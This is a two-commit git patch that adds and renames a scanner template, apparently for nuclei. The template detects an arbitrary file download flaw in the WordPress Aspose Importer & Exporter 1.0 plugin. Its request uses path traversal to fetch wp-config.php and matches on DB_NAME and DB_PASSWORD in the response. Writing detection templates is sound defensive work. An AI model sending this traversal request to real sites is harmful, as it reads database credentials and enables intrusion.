From 3400cfff5e6707b4030b022968e39971a53aa5dc Mon Sep 17 00:00:00 2001
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com>
Date: Fri, 22 Oct 2021 08:41:10 +0900
Subject: [PATCH 1/2] Create aspose-importer-exporter-file-download.yaml

---
 aspose-importer-exporter-file-download.yaml | 29 +++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 aspose-importer-exporter-file-download.yaml

diff --git a/aspose-importer-exporter-file-download.yaml b/aspose-importer-exporter-file-download.yaml
new file mode 100644
index 0000000000..0216e21bf1
--- /dev/null
+++ b/aspose-importer-exporter-file-download.yaml
@@ -0,0 +1,29 @@
+id: aspose-importer-exporter-file-download
+
+info:
+  name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
+  author: 0x_Akoko
+  severity: high
+  description: The Aspose importer and Exporter WordPress plugin is affected by an Arbitrary File Download security vulnerability.
+  reference:
+    - https://packetstormsecurity.com/files/131162/
+    - https://wordpress.org/plugins/aspose-importer-exporter
+  tags: wordpress,wp-plugin,lfi
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "DB_NAME"
+          - "DB_PASSWORD"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200

From 82ca4a8c4384c7e3d3264b433a1a64606f21feab Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Fri, 22 Oct 2021 15:59:44 +0530
Subject: [PATCH 2/2] Update and rename aspose-file-download.yaml to
 aspose-ie-file-download.yaml

---
 .../wordpress/aspose-ie-file-download.yaml                    | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename aspose-importer-exporter-file-download.yaml => vulnerabilities/wordpress/aspose-ie-file-download.yaml (90%)

diff --git a/aspose-importer-exporter-file-download.yaml b/vulnerabilities/wordpress/aspose-ie-file-download.yaml
similarity index 90%
rename from aspose-importer-exporter-file-download.yaml
rename to vulnerabilities/wordpress/aspose-ie-file-download.yaml
index 0216e21bf1..095211f5e4 100644
--- a/aspose-importer-exporter-file-download.yaml
+++ b/vulnerabilities/wordpress/aspose-ie-file-download.yaml
@@ -1,4 +1,4 @@
-id: aspose-importer-exporter-file-download
+id: aspose-ie-file-download
 
 info:
   name: Wordpress Aspose Importer & Exporter v1.0 Plugin File Download
@@ -8,7 +8,7 @@ info:
   reference:
     - https://packetstormsecurity.com/files/131162/
     - https://wordpress.org/plugins/aspose-importer-exporter
-  tags: wordpress,wp-plugin,lfi
+  tags: wordpress,wp-plugin,lfi,aspose
 
 requests:
   - method: GET